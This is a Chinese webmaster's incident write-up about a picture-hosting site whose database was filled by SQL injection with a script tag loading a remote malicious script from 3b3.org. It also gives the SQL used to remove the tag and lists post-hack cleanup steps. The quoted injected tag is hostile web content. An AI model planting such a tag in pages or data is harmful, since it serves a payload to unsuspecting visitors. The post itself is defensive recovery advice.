建站学院(LieHuo.Net)讯 前段时间接手了一个图片网站,发现有很多地方值得改进,于是在程序上加入了很多功能,使用起来很方便。却因此遭来了竞争对手的白眼,因为我们的网站是集外链和浏览一起,集免费和收集一体的相册。
周二起床,按惯例打开网站,却发现网站突然弹出一个窗口,同时杀毒软件也跳了出来。我惊恐地发现了一个我不愿意接受的现实:网站挂了!呵呵。马上叫来程序员,说网站被挂马了,要立马清除,考虑到会给浏览网站的用户用户带来很多不便,于是一场无声的战斗马上开始了。
我首先打开FTP,发现里面的文件并没有被修改,一般来说被挂马的多数是黑客入侵入修改程序文件,在里面置入代码。但这次怪了,里面文件的修改时间都是以前的没有改变过。这时候程序员反馈来消息,很有可能是SQL注入。于是我马上打开SQL数据库,发现里面,很多字段都被密密麻麻的。
| 以下为引用的内容: <script src=http://3b3.org/c.js></script> |
代码,这就是传说中的SQL注入,呵呵,终于找到原因了,于是用SQL语句批量将这些代码替换掉。
| 以下为引用的内容: update bbsmsg set msgmsg=replace(convert(varchar(8000),msgmsg),'<script src=http://3b3.org/c.js></script>','') |
注意,下划线部分为数据库表名和字段名,请灵活替换。
虽然说被注入的比较多,但用批量删除还是没有费到多少时间。网站重新恢复了正常,但我却轻松不起来,因为还找不到根本原因在哪里。难道有人知道我的后台密码?有人知道我的SQL密码?还是有人上传了带木马的程序?还是上传了恶意代码呢?
经过一番仔细的排查,终于排除了前三种可能,最后发现我们网站的程序,很多发站内信,BBS,还有修改相册资料的地方都可以发这种脚本语句。真是粗心大意啊,这么低极的错误常识也犯了。于是叫程序员把所有这发文本文档的地方(黑客可利用此上传恶意代码)都打上了补丁,堵住处了漏洞,引用很经典的一句台词:安全第一。方法其实很简单就是过滤掉这种脚本就可以了。抬头望望窗外的车水马龙,终于可以舒心地呼吸一口早晨的空气。
感谢CCTV,感谢黑黑客,感谢看贴的你,没有这次被挂的经历,也没有我的成长。谢谢大家。
最后总结出几条网站被黑后常用的步骤,希望能给大家带来帮助:
一、发现网站异常后,立马关掉网站,这样以免上浏览网站的用户受到影响;
二、查看FTP里的文件的修改时间,看有没有被更改过,有没有注入恶意代码。如果有,请删除掉;
三、查看数据库文件,看有没有字段被注入恶意代码,有的话则用SQL语句批量删除;
四、删除恶意代码后,一定要检查问题出在哪里,这一步很重要。是服务器有漏洞,还是程序有问题,找到问题后一定要打上补丁,以免再有类似的事故发生。如果自己不懂程序代码,这里介绍一个高手程序员的QQ:850268891;
五、保持良好的心态,总结经验教训,再接再励。(文章来自:www.126tu.com)